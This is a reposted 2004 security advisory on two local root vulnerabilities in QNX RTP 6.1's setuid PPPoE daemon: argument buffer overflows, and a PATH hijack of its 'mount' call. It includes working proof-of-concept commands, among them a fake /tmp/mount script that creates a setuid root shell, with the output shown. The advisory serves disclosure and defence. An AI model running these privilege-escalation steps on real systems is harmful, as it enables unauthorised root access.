QNX PPPoEd Local Root Vulnerabilities

Submitted by newsagent on

PPPoEd daemon is used to provide a PPPoE connection, such as DSL, for QNX users. Two vulnerabilities that can lead to root compromise have been found in QNX's PPPoE daemon.Vulnerable Systems:
* QNX RTP version 6.1

The PPPoE daemon, when launched, can receive command line arguments. It seems that there is hardly any bounds checking present when processing arguments. Once it is by default suid owned by root, an attacker can execute arbitrary instructions to elevate privileges. An example follows:
$ export overflow256='AAAAAAAAAAAAAAA(...)' (around 256 A's)
$ /usr/bin/pppoed -F $overflow256
Memory fault (core dumped)
$ /usr/bin/pppoed service=$overflow256
Memory fault (core dumped)

The same vulnerability also occurs when processing the following arguments: 'name', 'en', 'upscript', 'downscript', 'retries', 'timeout', 'scriptdetach', 'noscript', 'nodetach', 'remote_mac' and 'local_mac'.

The second issue with PPPoEd is that it is possible to execute commands by tricking PPPoEd. This can be done by altering the $PATH environment variable since PPPoEd does not mount with a proper absolute path. It attempts to execute 'mount -T io-net npm-pppoe.so'. When altering $PATH, '/usr/sbin/pppoed' will simply execute 'mount' (hostile code) looking for it at the /tmp directory. An example is in order:
$ cd /tmp
$ cat _EOF_ > mount
cp /bin/sh /tmp/rootshell
chown root /tmp/rootshell
chmod 4777 /tmp/rootshell
echo "Here comes your root shell"

And actually running PPPoE:
$ chmod 755 mount
$ export PATH=/tmp:$PATH
$ /usr/sbin/pppoed
$ ls -la /tmp
-rwxr-xr-x 1 sandimas users 88 Aug 25 2004 mount
-rwsrwxrwx 1 root 100 153384 Jun 22 2001 /tmp/rootshell
$ /tmp/rootshell
Here comes your root shell
# uname -a
QNX sandimas 6.1.0 2001/06/25-15:31:48 edt x86pc x86

Disclosure Timeline
27 Aug 2004 Vulnerabilities detected;
28 Aug - 01 Sep Looking for QNX security staff contact e-mail: no success;
02 Sep 2004 Advisory written and sent to security mail-lists.

Additional information
The information has been provided by Julio Cesar Fort: julio at rfdslabs.br